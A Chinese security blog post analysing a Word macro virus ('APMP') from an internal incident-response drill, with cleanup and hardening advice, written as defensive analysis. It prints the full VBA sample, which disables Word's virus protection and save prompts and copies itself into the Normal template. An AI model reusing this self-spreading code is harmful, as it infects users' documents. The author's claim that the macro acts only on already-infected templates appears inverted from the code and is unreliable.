记一次宏病毒分析

最新推荐文章于 2024-07-21 07:27:12 发布
最新推荐文章于 2024-07-21 07:27:12 发布
阅读量925 收藏 4
点赞数 2
分类专栏: 应急响应 文章标签: 安全 Web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq2539879928/article/details/131263537
版权

为方便您的阅读,可点击下方蓝色字体,进行跳转↓↓↓

01 事件背景介绍

某内部应急演练中,安全部门在终端防护软件中发现宏病毒告警,现需根据样本文件进行分析。


02 事件分析过程


对样本文件进行云沙箱病毒检测,检测结果如下:

在这里插入图片描述
在这里插入图片描述

在线云沙箱检测发现该文件属于宏病毒文件,该病毒由ThisDocument的模块组成,它使用Document_Open宏,Document_Close 宏和Document_New宏进行感染。它会感染WORD的通用模版(normal.dot)文件。


在这里插入图片描述

'APMP
'KILL
Private Sub Document_Open()
   On Error Resume Next  
   Application.DisplayStatusBar = False   不显示状态栏,防止显示宏的运行状态
   Options.VirusProtection = False   关闭病毒保护功能
   Options.SaveNormalPrompt = False   如果共用模板被修改,不显示提示窗口,直接保存
   MyCode = ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 20)
   Set Host = NormalTemplate.VBProject.VBComponents(1).CodeModule
   If ThisDocument = NormalTemplate Then _
      Set Host = ActiveDocument.VBProject.VBComponents(1).CodeModule
   With Host
       If .Lines(1, 1) = "APMP" & .Lines(1, 2) <> "KILL" Then 判断感染标志
          .DeleteLines 1, .CountOfLines   删除目标文件的所有代码
          .InsertLines 1, MyCode   向目标文件嵌入宏代码
          If ThisDocument = NormalTemplate Then _
             ActiveDocument.SaveAs ActiveDocument.FullName   保存文档
       End If
   End With
End Sub


根据上述代码分析,当带有该宏代码的文档被打开后,会检查模板文件是否已经受到 APMP 病毒感染。如果已经感染,则删除公用模板中的旧代码,将新的恶意代码插入模板中并保存。如果文档未被感染,则不会发生任何事情。

宏代码中对Normal.dotm通用模版文件操作记录见下图:
在这里插入图片描述
在这里插入图片描述
通过上述行为综合分析,该宏代码的核心逻辑为检查模版是否被感染,如果被感染则进行替换,无其余明显的恶意行为。


03 事件分析结果


该宏代码的核心逻辑为检查模版是否被感染,如果被感染则进行替换,无其余明显的恶意行为。


04 安全加固建议


1、处置建议:删除dotm模板文件(默认文件路径为:C:\Users\Administrator\AppData\Roaming\Microsoft\Templates\normal.dotm)后重启Word,或重新安装Word;使用终端杀毒软件进行全盘查杀,清除感染文档;设置宏安全级别为非常高,防止除Word默认的宏以外的其他宏运行;设置取消“信任所有安全的加载项和模板”,设置完毕后打开带有宏的Word文档时,会禁用宏。

2、提高安全意识:当网上下载资源、接收到别人发送的文件时,首先应有可能存在带毒文件的防范意识。不能直接打开或执行,而应先对文件进行扫描,确认文件无问题才可使用。

[系统安全] 十九.宏病毒之入门基础、防御措施、自发邮件及宏样本分析
杨秀璋的专栏
02-04 8609
您可能之前看到过我写的类似文章,为什么还要重复撰写呢?只是想更好地帮助初学者了解病毒逆向分析和系统安全,更加成体系且不破坏之前的系列。因此,我重新开设了这个专栏,准备系统整理和深入学习系统安全、逆向分析和恶意代码检测,“系统安全”系列文章会更加聚焦,更加系统,更加深入,也是作者的慢慢成长史。换专业确实挺难的,逆向分析也是块硬骨头,但我也试试,看看自己未来四年究竟能将它学到什么程度,漫漫长征路,偏向虎山行。享受过程,一起加油~ 作者前文介绍了病毒原理和防御知识,并通过批处理代码和漏洞(CVE-2018-202
[系统安全] 七.逆向分析之PE病毒原理、C++实现文件加解密及OllyDbg逆向
杨秀璋的专栏
12-26 6419
系统安全系列作者将深入研究恶意样本分析、逆向分析、攻防实战和Windows漏洞利用等,通过在线笔和实践操作的形式分享与博友们学习,希望能与您一起进步。前文介绍了条件语句和循环语句源码还原及流程控制逆向。这篇文章将分享勒索病毒,通过编写程序实现获取Windows系统目录文件,并对其进行加密和解密的过程;第二部分详细讲解了OllyDbg和在线沙箱的逆向分析过程。希望对入门的同学有帮助。
宏病毒分析
weixin_44156885的博客
10-25 1812
文章目录基本信息一,概述二,流程图三,技术细节详细分析宏exchangeX.dll61B00.dll进程行为注册表行为网络行为四,样本溯源五,查杀&恢复方案六,防护建议 基本信息 FileName FileType FileSize packer MD5 sample4.xls 宏病毒 338 KB no 3effeba64d9a1a4dd1bddaeb1858e4d0 ...
宏病毒的研究与实例分析01——基础篇
鬼手的博客
03-10 1万+
文章目录前言基础知识宏与宏病毒VB基础sub与functionVB基本函数对象宏病毒实例分析实例1oledump.py宏病毒分析技巧自动执行隐秘执行调用外部例程和命令执行字符串隐写Chr()函数Replace()函数CallByname 函数Alias替换函数名利用窗体、控件隐藏信息利用文件属性恶意行为字符串宏病毒的防御手段禁用宏越过自动宏恢复被宏病毒破坏的文档说明 前言 本系列文章将由浅入深对...
宏病毒的研究与实例分析03——宏病毒处理篇
鬼手的博客
03-11 3578
文章目录宏病毒处理思路破坏宏标志宏清除脚本手工清理宏(针对* .DOCM和* .XLSM文档)替换宏代码说明 在前一章我们解析了宏病毒的二进制格式,本篇紧跟上文,利用宏病毒的二进制格式清除宏病毒宏病毒处理思路 破坏宏标志 在解析OLE文件时,我们介绍过Directory,其中其偏移0x42H这个字节的表示DirectoryEntry的类型Type。0为非法,1为目录(storage),2为节点...
宏病毒的研究与实例分析04——实战分析
热门推荐
鬼手的博客
03-11 2万+
文章目录样本1-powershell_downloader样本2-严重混淆样本3-行为监控最后说明 本章我们将分析几个有趣的宏病毒,一窥宏病毒分析技巧。本章所有样本均存在恶意行为,请在虚拟机中运行。 样本1-powershell_downloader 首先使用oledump.py提取宏: 提取到的宏代码如下: Attribute VB_Name = &quot;Module1&quot; Sub Auto_Open...
SolidWorks软件二次开发(5):SolidWorks宏录制与应用
最新发布
kkchenjj的博客
07-21 1360
SolidWorks API(Application Programming Interface)是SolidWorks提供的一套编程接口,允许开发者通过VBA或其它编程语言访问和控制SolidWorks的功能。API包括了对SolidWorks对象模型的访问,如零件、装配体、图纸等。
[网络安全自学篇] 七十九.Windows PE病毒原理、分类及感染方式详解
杨秀璋的专栏
05-20 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了XSS跨站脚本攻击案例,主要内容包括XSS原理、不同类型的XSS、XSS靶场9道题目、如何防御XSS。这篇文章将介绍Windows PE病毒, 包括PE病毒原理、分类及感染方式详解,并通过案例进行介绍。基础性文章,希望对您有所帮助~
键盘鼠标宏录与自动化软件深度专版
描述部分重复“键盘鼠标录大师深度专版”三次,这可能是为了强调产品的专业性或者用于搜索引擎优化(SEO)的目的,以确保当潜在用户搜索相关关键词时,该软件能够出现在搜索结果的前端。 2. **无实质信息** ...
[系统安全] 五十七.恶意软件分析 (9)利用MS Defender实现恶意样本家族批量标注(含学术探讨)
杨秀璋的专栏
04-18 783
前文介绍了IDA Python配置过程和基础用法,然后尝试提取恶意软件的控制流图(CFG)。这篇文章将讲解如何利用MS Defender实现恶意样本家族批量标注,在通过VS、VT采集批量样本后,通常需要样本家族标注,如何准确识别家族类别至关重要,其将为后续的恶意软件家族分类或溯源提供帮助。在此感谢李师弟热心的指导和帮助,基础性基础,希望您喜欢,且看且珍惜。
宏病毒实验报告
05-07
宏病毒实验报告,包括台湾病毒和自己写的宏病毒试验
病毒实验报告
05-30
有关病毒方面课程的实验内容 实验一 PE结构分析及DOS病毒感染与清除 一、实验目的 1.熟悉PE文件结构 2.掌握DOS系统下.EXE文件病毒感染与清除方法 二、实验要求 1.实验之前认真准备,编写好源程序。 2.实验中认真调试程序,对运行结果进行分析,注意程序的正确性和健壮性的验证。 3.不断积累程序的调试方法。 三、实验内容 1)手工或编程从user32.dll中获得MessageBoxA的函数地址; 2)查阅资料,结合第2章内容,根据PE结构编写一个小的工具软件,或者用PE Explorer、PEditor、Stud_PE等工具软件查看、分析PE文件格式。针对PE文件格式,请思考:Win32病毒感染PE文件,须对该文件作哪些修改; 3)示例病毒exe_v感染原理及其清除 实验二 Windows病毒分析与防治 一、实验目的 掌握Windows病毒感染与清除方法 二、实验要求 1.实验之前认真准备,编写好源程序。 2.实验中认真调试程序,对运行结果进行分析,注意程序的正确性和健壮性的验证。 3.不断积累程序的调试方法。 三、实验内容 1)编程实现Immunity病毒; 2)修复被Immunity感染的host_pe.exe 3)编程实现脚本病毒或宏病毒,参考相关章节爱虫/梅丽莎病毒;修复被上述病毒感染的系统 实验三 蠕虫/木马的分析与防治 一、实验目的 掌握蠕虫/木马感染与清除方法 二、实验要求 1.实验之前认真准备,编写好源程序。 2.实验中认真调试程序,对运行结果进行分析,注意程序的正确性和健壮性的验证。 3.不断积累程序的调试方法。 三、实验内容 1)实现“冲击着清除者”病毒; 2)实现远程线程动态嵌入技术的木马并验证; 3)实现木马远程监视/控制; 4)修复被上述病毒感染的系统
宏病毒分析要点
weixin_42539095的博客
12-26 611
练习过一些宏病毒,总结一些最基本的方法 一.查看 提示启用内容,选择启用 Alt+F11即可查看宏代码 二.加密 部分宏加了密码 可以用如下工具破解 三.快速查找关键语句 大量简单的宏病毒直接在代码中搜索shell或者run即可找到关键的执行部分Ctrl+F,输入shell或者run查找,找到后下断点执行过来 选择左侧点击即可下断 然后运行 本地窗口查看,调试 添加监视即可看到关键部...
文档宏病毒
weixin_43781139的博客
07-16 3605
文档类病毒介绍 许多恶意代码都是通过文档进行传播。利用文档文件投放PE文件,再由PE文件执行恶意行为。一方面,结合社会工程学的诱导文档往往能够降低目标人员的安全防范意识,提高攻击的成功率;另一方面,文档可以通过邮件进行传播,而邮件作为最常用的通信方式,对邮箱的攻击,更容易收集用户信息并实现内网渗透。 下图是奇安信威胁情报中心在2018年全球高级持续性威胁研究总结报告中列出的部分组织鱼叉邮件攻击特点: 可以看到采用诱导文档附件进行的钓鱼邮件攻击的方式最为普遍。掌握各类文档文件的分析技巧就变得极为重要,我们将
宏病毒分析技巧 - 绕过密码保护
u012871930的博客
03-18 489
分析宏病毒样本时,偶尔会遇到带密码的宏病毒样本,有些工具可以直接读取或绕过输入密码 这里使用一种简单粗暴的方法来绕过宏密码保护,使用任意一款16进制编辑器,搜索DPB 将其修改为DPX 保存后,重新打开宏病毒样本,WORD弹出错误提示,点击 是 使用ALT+F11打开宏编辑器,然后打开右键Project属性 在属性窗口-&gt;保护 我们可以取消密码保护,或输入一个新密码 这里...
宏病毒
孤的博客
04-16 1万+
宏病毒定义 宏病毒是利用系统的开放性专门制作的一个或多个具有病毒特点的宏的集合,这种病毒宏的集合影响到计算机的使用,并能通过文档及模板进行自我复制及传播。 支持宏病毒的应用系统特点 要达到宏病毒传染的目的,系统须具备以下特性: 可以把特定的宏命令代码附加在指定文件上; 可以实现宏命令在不同文件之间的共享和传递; 可以在未经使用者许可的情况下获取某种控制权。 可支持宏病毒的应用系统 Micro...
宏病毒的研究与实例分析02——复合文档格式分析
鬼手的博客
03-11 2406
文章目录复合文档二进制解析复合文档数据结构解析准备工作基础知识HeaderFATDirectory补充宏代码数据结构解析说明 目前主流杀软在处理宏病毒时,都是直接删除含有宏病毒的文档,这样处理显得有些粗暴,将导致用户无法查看文档里的数据,如果是一些重要的业务数据,将造成业务数据的丢失,产生无法估计的后果。本文将介绍一种宏病毒处理思路,在不删除文档文件的情况下清除宏病毒。 复合文档二进制解析 在正式...
宏病毒(1)
WLINX
12-09 674
样本HASH:02BA9703D1F250B411EA4C868D17FD2E 先打开样本,发现是老版的宏警告。 然后点击启用宏,ALT+F11查看宏代码(打开之前可以按住shift,防止一切宏运行,但很多时候不好使),然后找到宏开始的地方,然后开始调试。 CTRL+F8运行到光标处,然后F8开始单步。 Sub userNaveLoadr() Dim path_Nave...
宏病毒(计算机病毒的一种)
weixin_40191861的博客
08-19 1068
在计算机技术的历史中,(英語:)是一种使得的相关应用文档内含有被称为的可执行代码的病毒。一个電子表格程式可能允许用户在一个文档中嵌入“命令”,使得某种操作得以自动运行;同样的操作也就可以将病毒嵌入电子表格来对用户的使用造成破坏。在1990年代中后期最流行的就是和办公软件(如及)相关的病毒。在90年代后期,的电子邮件软件(拥有scripting特性)成为传播病毒最常用的载体。直到今天还是如此。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Vista_AX

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值